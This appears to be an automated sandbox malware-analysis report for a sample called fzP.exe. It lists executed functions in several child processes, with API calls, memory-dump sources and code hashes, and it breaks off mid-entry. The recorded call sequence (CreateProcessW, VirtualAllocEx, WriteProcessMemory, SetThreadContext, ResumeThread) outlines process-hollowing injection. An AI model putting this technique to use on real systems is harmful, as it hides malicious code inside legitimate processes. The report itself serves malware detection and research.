Analysis Process: fzP.exePID: 4308, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	33.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	46
Total number of Limit Nodes:	4

Executed Functions

Function 02AD1B9C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02AD1D79

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: be5a6d35645d033357990d1afde1341aee8cc7b67c880f28f0d0cb3ffa15132c
Instruction ID: 60418aab06dced84da79f1230423467791e71fee69a904555fe997d990f69022
Opcode Fuzzy Hash: be5a6d35645d033357990d1afde1341aee8cc7b67c880f28f0d0cb3ffa15132c
Instruction Fuzzy Hash: FF81D3B4D00219DFDB21CFA9C880BDDBBF5BB09300F1095AAE509B7250DB70AA89DF55

Function 02AD4024 Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02AD7081

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b6387d04d6a6317f44e26fde33b8ff60d71f5ce852b23e9d0a6240dc745d9d0f
Instruction ID: d683c8c0fc38b34f25720d33b74adc64eafb7fbdd4b96067be02c17f14c8500f
Opcode Fuzzy Hash: b6387d04d6a6317f44e26fde33b8ff60d71f5ce852b23e9d0a6240dc745d9d0f
Instruction Fuzzy Hash: 4A81D4B4D00259DFDB20CFA9C884BDDBBF5BB09300F1091AAE509B7250DB709A89CF55

Function 02AD614C Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02AD7EB9

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ce2d03e78d850264246d6c5e9cfdda5ac30cfacd9fa897ea63fcc8728b2c9d55
Instruction ID: de2ea3b0af37eafc5ad92dbef9317a0c05ff4b555feced8aa5c14ac91fb8a637
Opcode Fuzzy Hash: ce2d03e78d850264246d6c5e9cfdda5ac30cfacd9fa897ea63fcc8728b2c9d55
Instruction Fuzzy Hash: 5981D2B5D002198FDB24CFA9C884BEDBBF5BB49300F1091AAE509B7250DB70AA85CF55

Function 02AD7CDC Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02AD7EB9

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4463842b01c434f8d2dcdef563fd7186138b2012db0178ec6606cab542b21143
Instruction ID: e337794f35474b4b1c3d2b781587fa7a74e1b41c325e3add98f5c073f04e46d8
Opcode Fuzzy Hash: 4463842b01c434f8d2dcdef563fd7186138b2012db0178ec6606cab542b21143
Instruction Fuzzy Hash: 1881D3B5D00219CFDB24CFA9C884BEDBBF5BB49300F1091AAE509B7250DB309A89CF55

Function 02AD6EA4 Relevance: 1.7, APIs: 1, Instructions: 222
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 02AD7081

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 72f193e6c3f02475264aace2c501cfa1a9630ce17b06ac12c8d9826acb1da4b2
Instruction ID: e5bdad70f1220379b55c3fcd848d4cd0cd453c35a207f91043f6b83393a8ca2b
Opcode Fuzzy Hash: 72f193e6c3f02475264aace2c501cfa1a9630ce17b06ac12c8d9826acb1da4b2
Instruction Fuzzy Hash: CD81E4B5D00259DFDB21CFA9C884BDDBBF5BB09300F1491AAE509B7220DB309A89CF55

Function 02AD4E34 Relevance: 1.7, APIs: 1, Instructions: 222
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02AD5011

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 252c180c6974d8cdaf6b2183ec88e43f7f0110e415efcd94cf581a8da353b6ed
Instruction ID: 437417a1e5efaa050a97b51f312813b9ee1c0b4a38dc1fa93eec565f47643b0f
Opcode Fuzzy Hash: 252c180c6974d8cdaf6b2183ec88e43f7f0110e415efcd94cf581a8da353b6ed
Instruction Fuzzy Hash: 8281D2B4D002598FDF21CFA9C880BDDBBF5BB49300F1490AAE509B7220DB709A85CF55

Function 02AD5C6C Relevance: 1.7, APIs: 1, Instructions: 221
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02AD5E49

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d53a9ad07107fc64f042e23e6239b1fbd307d5d8694e953555ab935a207d9d4c
Instruction ID: 3cf2f74542afe8ed346e895ee33ae72e2135dfddb6fcef2610150b376eb4ae33
Opcode Fuzzy Hash: d53a9ad07107fc64f042e23e6239b1fbd307d5d8694e953555ab935a207d9d4c
Instruction Fuzzy Hash: 6581C1B4D002199FDB21DFA9C984BDDBBF5BB09300F1490AAE549B7260DB309A85CF55

Function 02AD1BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02AD1D79

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ff80ae5f093a76a1d8a481c926c9ca121adc524f6a6ad53ff2f2ed3cb06bd990
Instruction ID: 7c6e55ff4e610f756f1ed3a833e81086b13df394106f86de5c347eaa0747b024
Opcode Fuzzy Hash: ff80ae5f093a76a1d8a481c926c9ca121adc524f6a6ad53ff2f2ed3cb06bd990
Instruction Fuzzy Hash: 0B81C2B4D00219DFDB21CFA9C880BDDBBF5BB09300F1095AAE509B7250DB70AA89DF55

Function 02AD4E40 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02AD5011

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7aadae3b66015f488a175bf5aab5edfdf291e49e120df67e0d201464296e17b4
Instruction ID: 4ccc5ec09ece2b879ba80f95c099a73ac3ce736fc8aa46057fe70574d70d6583
Opcode Fuzzy Hash: 7aadae3b66015f488a175bf5aab5edfdf291e49e120df67e0d201464296e17b4
Instruction Fuzzy Hash: 7B81D2B4D002598FDF21CFA9C880BDDBBF5BB49300F1090AAE509B7210DB70AA85DF55

Function 02AD5C78 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02AD5E49

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 534d3dcd474e62ac520b2800786ea0399bcd9373150c5c96e5cdc1bde2c269b3
Instruction ID: eca5494daae5592c873254aee2708d2ae0689e74afb7b51d58736c23209010f4
Opcode Fuzzy Hash: 534d3dcd474e62ac520b2800786ea0399bcd9373150c5c96e5cdc1bde2c269b3
Instruction Fuzzy Hash: EE81B2B4D002199FDB21DFA9C884BDDBBF5BB09300F1091AAE549B7260DB709A85CF55

Function 02AD21F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02AD22C6

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dd22a0b91722ebd55c0e73895531450ede9254200745185dc203d050cb83ed69
Instruction ID: a23923c38e54cc1fc352fe730c5120edb7e097bfdea6f18cc6e55f247dc4a53c
Opcode Fuzzy Hash: dd22a0b91722ebd55c0e73895531450ede9254200745185dc203d050cb83ed69
Instruction Fuzzy Hash: 074186B5D042589FCB00CFA9D984ADEFBF1BB49310F24902AE818B7210D375AA45CF64

Function 02AD21F0 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02AD22C6

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 38bdf29eb0dd22522f9ac6284652fc225b470a7e03d8d8bed41e896f19570ea1
Instruction ID: d84773fa7bb96e7628b6e896327b13e0db8f65785d9365d18ebf168ca7c9b93a
Opcode Fuzzy Hash: 38bdf29eb0dd22522f9ac6284652fc225b470a7e03d8d8bed41e896f19570ea1
Instruction Fuzzy Hash: BE4188B9D04258DFCB00CFA9D984ADEFBF1BB49314F24902AE819B7210D335AA45CF64

Function 02AD1FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02AD2085

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 996c5fd53a949f3196394bf0f548eade9572d7b157cfac981cb979155879170b
Instruction ID: e4413c44d0c29a2c074022b8fb4844afc0729adc74f3ac73f57070ae26f0b002
Opcode Fuzzy Hash: 996c5fd53a949f3196394bf0f548eade9572d7b157cfac981cb979155879170b
Instruction Fuzzy Hash: 803187B9D04258DFCF10CFAAD984ADEFBB5BB19310F10A02AE815B7210D375A945CF68

Function 02AD1FD0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02AD2085

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f1f13301fa1830e566f92a1db9ddea4c2d41567ef7e08abb81e285fcb8bd9741
Instruction ID: 8a3bd0bdd584a6d74bdf9670c7a67d383d0904db34bd82094f7fb5502833b104
Opcode Fuzzy Hash: f1f13301fa1830e566f92a1db9ddea4c2d41567ef7e08abb81e285fcb8bd9741
Instruction Fuzzy Hash: 4F3196B9D04259DFCF10CFA9D584ADEFBB1BB19310F10A02AE829B7210C335A945CF68

Function 02AD20E8 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02AD2195

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a49d6f8100c13bc67dd2a41cfd8772c1ec9588c988d6cdef137f6c2e7321b804
Instruction ID: eec6c9c96ea358d2c8514722c1f6d33c2dc5900cfa2702f24ee40917b2028941
Opcode Fuzzy Hash: a49d6f8100c13bc67dd2a41cfd8772c1ec9588c988d6cdef137f6c2e7321b804
Instruction Fuzzy Hash: 113185B9D002589FCF10CFA9E984A9EFBB5BB59310F10A02AE914B7310D335A945CF64

Function 02AD20F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02AD2195

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 51cd18e647492a0a374cc1a87db31f891699b362996ef6195ba6ff2be30ba001
Instruction ID: ae8d7c95fd529ed43ea1db3f80b093e878c77c46c08c9b7c7e51a06edcf87367
Opcode Fuzzy Hash: 51cd18e647492a0a374cc1a87db31f891699b362996ef6195ba6ff2be30ba001
Instruction Fuzzy Hash: 0F3174B9D042589FCF10CFA9D984A9EFBB5BB59310F10A02AE924B7310D335A945CF65

Function 02AD1EC1 Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02AD1F72

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f401b33079283b1b3b0a0d2207016efd898e314a66291262a22b47a7f3a0b667
Instruction ID: e89b66908f5fbaa0ee8f7359c9df59e912e05042ad9c3dae5c0027cfa65232c2
Opcode Fuzzy Hash: f401b33079283b1b3b0a0d2207016efd898e314a66291262a22b47a7f3a0b667
Instruction Fuzzy Hash: D831C7B5D012589FCB10CFAAD884ADEFBF1BB49314F24802AE419B7210D738AA45CF64

Function 02AD1EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 02AD1F72

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 34af6a2eba851cd64217ba7cc7b0b06d30b72f26471d5e4e6254c2d7c41e393c
Instruction ID: 7a78e32ddaa584ae2dd699011562ac1637b30587a70eaf2a67d13b84efe007b6
Opcode Fuzzy Hash: 34af6a2eba851cd64217ba7cc7b0b06d30b72f26471d5e4e6254c2d7c41e393c
Instruction Fuzzy Hash: 2831B8B5D012589FCB10CFAAD984ADEFBF1BB49314F24802AE419B7310C779AA45CF64

Function 02AD2331 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 02AD23AE

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 442b9c9cab6bf6a93405eaa64f2e0eaecfc2ac5a7ad73e89fdc164408e778741
Instruction ID: 82bfa1460115b7bb6d31619975d908d6081a629a3621f03415c8207f005b6a59
Opcode Fuzzy Hash: 442b9c9cab6bf6a93405eaa64f2e0eaecfc2ac5a7ad73e89fdc164408e778741
Instruction Fuzzy Hash: 1F21A8B9D002099FCB10CFA9D584ADEFBF4BB49314F24905AE819B7310D735A945CFA4

Function 02AD2338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 02AD23AE

Memory Dump Source

Source File: 00000004.00000002.2158312755.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2ad0000_fzP.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3ae5ec0084cdc15b1835c667fd2f1cc68f19abb151cc93da128aac94ed2cd736
Instruction ID: 43d774620306735f775e3118738b368520a694b3b79d9f3afdefb0b96003bfa8
Opcode Fuzzy Hash: 3ae5ec0084cdc15b1835c667fd2f1cc68f19abb151cc93da128aac94ed2cd736
Instruction Fuzzy Hash: B521B7B8D002099FCB10CFA9D484ADEFBF4BB49320F20906AE819B3310C335A945CFA4

Analysis Process: fzP.exePID: 6984, Parent PID: 4308COMMON

Executed Functions

Function 00EB0901 Relevance: 3.8, Strings: 3, Instructions: 67COMMON

Download Yara Rule

Strings

Haq, xrefs: 00EB095D
0P, xrefs: 00EB0948
0P, xrefs: 00EB096F

Memory Dump Source

Source File: 00000005.00000002.2185539220.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_eb0000_fzP.jbxd

Similarity

API ID:
String ID: 0P$0P$Haq
API String ID: 0-1590764697
Opcode ID: 8625bd5a918a4e0944f0498cb624ae51a047de4a0acf4905c04b472dcca9eead
Instruction ID: 497629697d4e609238e487d88eead2e1ed47549c00ce952792dd0a29a0e4c57c
Opcode Fuzzy Hash: 8625bd5a918a4e0944f0498cb624ae51a047de4a0acf4905c04b472dcca9eead
Instruction Fuzzy Hash: BE219230E051499FCB44EFB8D5553AEBFF1AF84340F1045B9C849A7695EB709E15C781

Function 00EB0BD8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185539220.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_eb0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7bb89c5b67c455dac8ada6c52d2d11c03b3f5c66eaf3a91ed93ab9b1615c18
Instruction ID: 02820bb54b0793f6d352897d7c9aee698ab321d4b7194546d82abaf5b73af102
Opcode Fuzzy Hash: 9b7bb89c5b67c455dac8ada6c52d2d11c03b3f5c66eaf3a91ed93ab9b1615c18
Instruction Fuzzy Hash: A971C9747002058FCB15EB79E86866F7BF2FF84744B104969E40AEB7A5DF70AD058B81

Function 00EB1771 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185539220.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_eb0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea20131d862b94648ca6e4ee89623c7f67f977405587a29b05f03f08703a8b26
Instruction ID: 72725e2c942d81ea98aeed3ed3b9ac5148c2a7a30327631f20b8c69ed6e0e24b
Opcode Fuzzy Hash: ea20131d862b94648ca6e4ee89623c7f67f977405587a29b05f03f08703a8b26
Instruction Fuzzy Hash: F321B375B0020A4FCB04AFBD58643AFBAEAAFC9350B14487DD54AD7392DE348D0687A1

Function 00EB1660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185539220.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_eb0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c851bec4edef7a9a4da10cebf03ff39aba6c09bf18a3d753606462c94fec64
Instruction ID: 92c42a94c1d9d1b6e9808a91f8bc674766006d32db3e31600ce6d0c1962e7287
Opcode Fuzzy Hash: 04c851bec4edef7a9a4da10cebf03ff39aba6c09bf18a3d753606462c94fec64
Instruction Fuzzy Hash: B921A07490120ADFCB05EFB8D9546AE7BB2FF84308F204968E405A7755EB306AA4CB91

Function 00EB0CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185539220.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_eb0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689d8469e9a9fefd6e5029b8d6f1e3c20705bfc1b7ef84aa80aa09ea08521c59
Instruction ID: 2d4fe974faf85b94ba5355d82a5685be7e38906c75d89f4d8d2c5b540e4cb60e
Opcode Fuzzy Hash: 689d8469e9a9fefd6e5029b8d6f1e3c20705bfc1b7ef84aa80aa09ea08521c59
Instruction Fuzzy Hash: 152180727007464FCB2AAB39945816F76E2FF842543104D3DD46A9B690DF74AD094B82

Function 00EB0848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2185539220.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_eb0000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35206796641c984ed2059338e7285fec8fdf907eacd4f3f2d92d26b768df8833
Instruction ID: 1430161542e2c0cc4f5cd8db5bacc6b7e4a534c6342c76a362c0f857cec3569f
Opcode Fuzzy Hash: 35206796641c984ed2059338e7285fec8fdf907eacd4f3f2d92d26b768df8833
Instruction Fuzzy Hash: B901DE741021479FCB01FF18FAA0A453BA6F74431CB208E54F4088BE2EF6746A768F91

Analysis Process: fzP.exePID: 652, Parent PID: 4308COMMON

Executed Functions

Function 02800901 Relevance: 3.8, Strings: 3, Instructions: 65COMMON

Download Yara Rule

Strings

0P, xrefs: 0280096F
0P, xrefs: 02800948
Haq, xrefs: 0280095D

Memory Dump Source

Source File: 00000006.00000002.2187397201.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2800000_fzP.jbxd

Similarity

API ID:
String ID: 0P$0P$Haq
API String ID: 0-1590764697
Opcode ID: 9bb0d75c8f296cc23759198ebe6521354ffd2a642d51a1a5b4ec522911bbd87e
Instruction ID: dc91cda9bca1b04180ae20d8968c17e2e474b027d14d5349ee883ec416cbfa18
Opcode Fuzzy Hash: 9bb0d75c8f296cc23759198ebe6521354ffd2a642d51a1a5b4ec522911bbd87e
Instruction Fuzzy Hash: 1F218E38E052488FCB44EFBCD8957AEBBB1AF85300F1044B9D449EB296DB308E05CB81

Function 02800BD8 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2187397201.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2800000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00da1cb1bab44e855e67e293dc7a3ad67d09af58ee36df891ddc1e15d1839faa
Instruction ID: 6fd11d2d525195532c2ec45ac1cb0fb94cdf9b99883a30361bf10adff78503e1
Opcode Fuzzy Hash: 00da1cb1bab44e855e67e293dc7a3ad67d09af58ee36df891ddc1e15d1839faa
Instruction Fuzzy Hash: 2F71A5797002068FCB59EF79D85862E7BA2FFC5300B204968E406DB7E5DF759D068B82

Function 02801771 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2187397201.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2800000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd69f89ea6ddf116cfa9d6051d6b3ee7dc59cdd7a8ed1edaf8ff15e8ada3e0d
Instruction ID: b9776b8f8b0ea704a13a9fcf8eae4f6fdcac6b13401fcc6a06f8dccc10ff0f45
Opcode Fuzzy Hash: afd69f89ea6ddf116cfa9d6051d6b3ee7dc59cdd7a8ed1edaf8ff15e8ada3e0d
Instruction Fuzzy Hash: AC217175B1021A9FCB48AFBD485826EBAE6EFC9310B11442DD54AD7291DF348D0687A1

Function 02801660 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2187397201.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2800000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16aaf1ad571852e2629207857b3199ac75ad9b10201ad609b38cc035b9cbcca2
Instruction ID: 513a51cf7dc68bf61ed0af9621f4519ac6707a6f2f659e64f92333f0287afedb
Opcode Fuzzy Hash: 16aaf1ad571852e2629207857b3199ac75ad9b10201ad609b38cc035b9cbcca2
Instruction Fuzzy Hash: D7215E78A0020ADFCB45EFB8D84476D7BB2FFC4304F204969E405A7394EB356A96CB91

Function 02800CC2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2187397201.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2800000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b471b2d8c2542b40bf6aa049e6eb35e85b3445906f7322ae6e9e51905b2b93
Instruction ID: b42ff61a9738abde3f0491a5ca07eceab15c3f9eec7213a6a8c19f1193d592ec
Opcode Fuzzy Hash: f5b471b2d8c2542b40bf6aa049e6eb35e85b3445906f7322ae6e9e51905b2b93
Instruction Fuzzy Hash: 61216F76700A424FCA5AAB79885812E7AE2FFC52143108D2DD56ADB690DF74DD0A4BC2

Function 02800848 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2187397201.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2800000_fzP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b021c9f6abad99c97795ab1acdd620443d3c3b1c266ac9e26814e4eb5ed05cc5
Instruction ID: 58ccc211588f5417655cc083834dce9f52b7c794e01b16f5a06ee554eda16854
Opcode Fuzzy Hash: b021c9f6abad99c97795ab1acdd620443d3c3b1c266ac9e26814e4eb5ed05cc5
Instruction Fuzzy Hash: 2301997C5012069FCB02FF18F984B5577B6FBC4304B209E54B4088B269E77679AB8F81

Analysis Process: fzP.exePID: 3996, Parent PID: 4308COMMON

Executed Functions

Function 00D80901 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

